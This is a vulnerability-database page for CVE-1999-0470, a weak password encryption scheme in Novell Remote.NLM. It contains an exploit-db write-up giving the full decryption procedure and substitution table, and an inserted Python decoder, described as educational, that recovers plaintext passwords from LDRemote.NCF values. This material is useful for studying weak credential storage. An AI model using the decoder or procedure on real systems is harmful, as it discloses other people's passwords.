CVE-1999-0470
CVSS5.0
Published: 1999-04-09 00:00:00
Revised: 2008-09-09 08:34:37

[Original] A weak encryption algorithm is used for passwords in Novell Remote.NLM, allowing them to be easily decrypted.


[CNNVD] Novell Remote.NLM Weak Encryption Vulnerability (CNNVD-199904-021)

Novell Remote.NLM uses a weak encryption algorithm, so its passwords are easily decrypted.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0470
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0470
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199904-021
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/482
(UNKNOWN) BID 482

- Vulnerability information

Novell Remote.NLM Weak Encryption Vulnerability
Medium severity  Design error
1999-04-09 00:00:00 2005-07-27 00:00:00
Local
Novell Remote.NLM uses a weak encryption algorithm, so its passwords are easily decrypted.

- Advisories and patches

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (19364)

Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability (EDBID:19364)
netware local
1999-04-09 Verified
0 dreamer
source: http://www.securityfocus.com/bid/482/info

The encrypted passwords for Remote.NLM are remotely accessible to anyone with the ability to view SYS:System\LDRemote.NCF. The password encryption algorithm for Remote.NLM has been broken and can be decrypted with pencil and paper.

The password will look something like this:
AF8CBBF48CA9955F5ADAFDADAA23

The structure of the password is as follows:
AF8CBBF48CA99 55F5ADAFDADAA - 23

The first section contains the low-order bits, and the second, the high-order bits. 23 is the time byte, which is decremented by the server once every two seconds, from FF to 02, then back up to FF, etc.

Step 1) Realign the low-order bits and high-order bits.
This is extremely simple to do. The high-order bits are in order from the first character to the last, and so are the low-order bits.
Example:
Password: AF8CBBF48CA99 - 55F5ADAFDADAA,
Output: 5A 5F F8 5C AB DB AF F4 D8 AC DA A9 A9
At this point, ignore 5A 5F F8 5C, or the first four bytes. They are appended somewhere during encryption, and decrypt to "%*@$". It was a TERRIBLE idea for Novell to implement those four characters into every single password, as those are what helped me rebuild their hash table from scratch. Also, if the length of the password is 10, the password is automatically decryptable to nul.

Step 2) Match each of the password characters (group of two hex characters) to the hash table below. Use their position from the beginning of the table to determine the value of the pre-hash encrypted password. Example: F4, the 8th character of the password, matches the hash table at 95. This means that 95 is the pre-hash value of F4. Thus far, (ignoring the first four characters) the password was:
AB DB AF F4 D8 AC DA A9 A9
and now the password is:
98 A0 9B 95 A1 9D A6 9C 9C

Remote.NLM Hash Table

00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00 5B 58 5E 5F 59 5C 5A 5D-73 70 76 77 71 74 72 75
10 13 10 16 17 11 14 12 15-7B 78 7E 7F 79 7C 7A 7D
20 53 50 56 57 51 54 52 55-03 00 06 07 01 04 02 05
30 1B 18 1E 1F 19 1C 1A 1D-0B 08 0E 0F 09 0C 0A 0D
40 2B 28 2E 2F 29 2C 2A 2D-63 60 66 67 61 64 62 65
50 83 80 86 87 81 84 82 85-3B 38 3E 3F 39 3C 3A 3D
60 8B 88 8E 8F 89 8C 8A 8D-33 30 36 37 31 34 32 35
70 93 90 96 97 91 94 92 95-6B 68 6E 6F 69 6C 6A 6D
80 9B 98 9E 9F 99 9C 9A 9D-A3 A0 A6 A7 A1 A4 A2 A5
90 F3 F0 F6 F7 F1 F4 F2 F5-AB A8 AE AF A9 AC AA AD
A0 DB D8 DE DF D9 DC DA DD-FB F8 FE FF F9 FC FA FD
B0 23 20 26 27 21 24 22 25-B3 B0 B6 B7 B1 B4 B2 B5
C0 CB C8 CE CF C9 CC CA CD-BB B8 BE BF B9 BC BA BD
D0 C3 C0 C6 C7 C1 C4 C2 C5-D3 D0 D6 D7 D1 D4 D2 D5
E0 43 40 46 47 41 44 42 45-E3 E0 E6 E7 E1 E4 E2 E5
F0 4B 48 4E 4F 49 4C 4A 4D-EB E8 EE EF E9 EC EA ED

Step 3) Subtract the length (the number of groups of hex characters, excluding the time character) of the full password from each encrypted password character. Now you have the ACTUAL pre-hash encrypted password. If the subtracted value is negative then simply continue from FF down to the negative value. Example: if the password character is at 04, and the length is 6, the value of the password character will be FF.

The length is 13 (D in hex), so the password was:
98 A0 9B 95 A1 9D A6 9C 9C
and is now:
8B 93 8E 88 94 90 99 8F 8F

Step 4) Get the time var, in this situation 23 (hex), and subtract it from FF. This new character is for use in Step 5. Example: FF-23=DC.

Step 5) Finally, XOR each character (group of 2 hex characters) of the encrypted password with the new time character, and you now have the decrypted password!

The password was:
8B 93 8E 88 94 90 99 8F 8F (before the XOR)

Now, the decrypted password is:
57 4F 52 54 48 4C 45 53 53
"WORTHLESS"

The exploit program does all this automatically.

http://www.exploit-db.com/sploits/19364.zip
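The five steps above, carried through on the write-up's own sample value as an added educational illustration. This is not code from the original post, from exploit-db or from Novell; it assumes the table printed in the write-up is transcribed exactly and that a stored value has the layout the write-up describes (low-nibble string, high-nibble string, time byte). The names TABLE, INVERSE, decode_full, decode, encode and table_is_permutation are this example's own. The point for a defender is structural: every quantity the transform depends on (the substitution table, the length, the time byte) is fixed or recoverable from the stored value itself, so there is no secret and read access to the file is equivalent to disclosure of the password.

```python
# Added educational example: the Remote.NLM password transform as described in
# the write-up above, applied to the write-up's own sample value. Not code from
# the original post, from exploit-db, or from Novell.

# Substitution table transcribed from the write-up (row labels and dashes
# dropped). TABLE[pre_hash_value] is the byte that ends up in LDRemote.NCF.
TABLE = bytes.fromhex("""
5B 58 5E 5F 59 5C 5A 5D 73 70 76 77 71 74 72 75
13 10 16 17 11 14 12 15 7B 78 7E 7F 79 7C 7A 7D
53 50 56 57 51 54 52 55 03 00 06 07 01 04 02 05
1B 18 1E 1F 19 1C 1A 1D 0B 08 0E 0F 09 0C 0A 0D
2B 28 2E 2F 29 2C 2A 2D 63 60 66 67 61 64 62 65
83 80 86 87 81 84 82 85 3B 38 3E 3F 39 3C 3A 3D
8B 88 8E 8F 89 8C 8A 8D 33 30 36 37 31 34 32 35
93 90 96 97 91 94 92 95 6B 68 6E 6F 69 6C 6A 6D
9B 98 9E 9F 99 9C 9A 9D A3 A0 A6 A7 A1 A4 A2 A5
F3 F0 F6 F7 F1 F4 F2 F5 AB A8 AE AF A9 AC AA AD
DB D8 DE DF D9 DC DA DD FB F8 FE FF F9 FC FA FD
23 20 26 27 21 24 22 25 B3 B0 B6 B7 B1 B4 B2 B5
CB C8 CE CF C9 CC CA CD BB B8 BE BF B9 BC BA BD
C3 C0 C6 C7 C1 C4 C2 C5 D3 D0 D6 D7 D1 D4 D2 D5
43 40 46 47 41 44 42 45 E3 E0 E6 E7 E1 E4 E2 E5
4B 48 4E 4F 49 4C 4A 4D EB E8 EE EF E9 EC EA ED
""")
assert len(TABLE) == 256
# Position of each stored byte in the table, i.e. the inverse lookup of step 2.
INVERSE = {stored: pre for pre, stored in enumerate(TABLE)}

PREFIX = "%*@$"  # constant the write-up says is prepended to every password


def table_is_permutation() -> bool:
    """True if every byte value occurs exactly once: the table is a bijection
    and therefore invertible without any key material."""
    return len(set(TABLE)) == 256


def decode_full(stored: str) -> str:
    """Steps 1-5 of the write-up; returns the prefix plus the password."""
    stored = stored.strip().upper()
    time_byte = int(stored[-2:], 16)            # last group: the time byte
    body = stored[:-2]
    if len(body) % 2:
        raise ValueError("body must split into two equal halves")
    half = len(body) // 2
    low_nibbles, high_nibbles = body[:half], body[half:]
    # Step 1: realign; the i-th high nibble and i-th low nibble form one byte.
    realigned = [int(h + l, 16) for h, l in zip(high_nibbles, low_nibbles)]
    length = len(realigned)                     # 13 (0x0D) in the sample
    # Step 2: the table position of each stored byte is the pre-hash value.
    pre_hash = [INVERSE[b] for b in realigned]
    # Step 3: subtract the length, wrapping from 0x00 back to 0xFF.
    shifted = [(v - length) & 0xFF for v in pre_hash]
    # Step 4: the XOR mask comes from the time byte, which is stored in the
    # clear alongside the value, so it is not a secret.
    mask = 0xFF - time_byte
    # Step 5: XOR every byte with the mask.
    return bytes(v ^ mask for v in shifted).decode("latin-1")


def decode(stored: str) -> str:
    """Password only, after checking that the constant prefix is present."""
    plain = decode_full(stored)
    if not plain.startswith(PREFIX):
        raise ValueError("unexpected prefix: %r" % plain[:len(PREFIX)])
    return plain[len(PREFIX):]


def encode(password: str, time_byte: int) -> str:
    """Exact inverse of decode_full, included only to show the round trip
    (this example's reconstruction, not Novell's code)."""
    plain = (PREFIX + password).encode("latin-1")
    length = len(plain)
    mask = 0xFF - time_byte
    stored_hex = "".join("%02X" % TABLE[((b ^ mask) + length) & 0xFF]
                         for b in plain)
    low_nibbles, high_nibbles = stored_hex[1::2], stored_hex[0::2]
    return low_nibbles + high_nibbles + "%02X" % time_byte


if __name__ == "__main__":
    sample = "AF8CBBF48CA9955F5ADAFDADAA23"      # value from the write-up
    print(table_is_permutation(), decode_full(sample), decode(sample))
```

decode_full on the sample yields the "%*@$" prefix the author mentions followed by WORTHLESS; encode with a different time byte produces a different stored string that decode still reads, which is what makes the time byte a nonce rather than a key. Since table_is_permutation() holds and both remaining parameters sit in the stored value, nothing in the scheme depends on a secret; password storage that must survive file disclosure needs a salted one-way function, not a reversible substitution.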

- Vulnerability information

10919
Novell Remote.NLM Weak Password Encryption Scheme
Remote / Network Access Cryptographic
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

1999-04-09 Unknown
1999-04-09 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete